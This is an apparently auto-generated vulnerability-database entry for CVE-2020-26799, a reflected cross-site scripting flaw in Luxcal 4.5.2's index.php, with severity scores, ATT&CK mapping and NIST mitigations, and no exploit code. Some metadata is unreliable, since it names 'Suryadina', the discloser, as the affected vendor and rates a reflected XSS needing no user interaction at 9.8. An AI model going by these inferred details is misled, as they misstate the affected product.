Cyber Resilience

CVE-2020-26799

Critical

Published: 21 July 2025

Published
21 July 2025
Modified
15 April 2026
KEV Added
Patch
CVSS Score v3.1 9.8 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS Score 0.0081 74.6th percentile
Risk Priority 20 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2020-26799 is a critical-severity Cross-site Scripting (CWE-79) vulnerability in Suryadina (inferred from references). Its CVSS base score is 9.8 (Critical).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 25.4% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).

Deeper analysis

CVE-2020-26799 is a reflected cross-site scripting (XSS) vulnerability, classified under CWE-79, affecting the index.php file in Luxcal version 4.5.2. Published on 2025-07-21, it carries a CVSS v3.1 base score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), marking it as critical due to its potential for high impacts on confidentiality, integrity, and availability.

Unauthenticated attackers can exploit this vulnerability remotely with low complexity and no privileges or user interaction required. Successful exploitation allows them to steal other users' data by injecting and reflecting malicious scripts through the affected endpoint.

Advisories and patches for mitigation are detailed in references including the vulnerability disclosure at https://suryadina.com/luxcal-reflected-xss-cve-2020-26799/, the Luxcal download page at https://www.luxsoft.eu/index.php?pge=dload, and a demonstration video at https://youtu.be/npw9jcQ1h1U.

EU & UK References

Vulnerability details

A reflected cross-site scripting (XSS) vulnerability was discovered in index.php on Luxcal 4.5.2 which allows an unauthenticated attacker to steal other users' data.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
Why these techniques?

Reflected XSS in public-facing web app (index.php) directly enables remote exploitation of the application without auth or interaction.

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

CVEs Like This One

CVE-2021-47873Shared CWE-79
CVE-2026-7052Shared CWE-79
CVE-2024-56060Shared CWE-79
CVE-2025-49043Shared CWE-79
CVE-2026-40038Shared CWE-79
CVE-2024-56022Shared CWE-79
CVE-2025-68889Shared CWE-79
CVE-2026-1074Shared CWE-79
CVE-2025-22539Shared CWE-79
CVE-2025-22286Shared CWE-79

Affected Assets

Suryadina
inferred from references and description; NVD did not file a CPE for this CVE

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Directly mitigates the specific reflected XSS flaw in Luxcal 4.5.2 index.php by requiring timely identification, reporting, and patching of the vulnerability.

prevent

Prevents execution of reflected malicious scripts by filtering information outputs from the vulnerable index.php endpoint.

prevent

Blocks injection of malicious scripts by validating all user inputs to the index.php file before processing.

References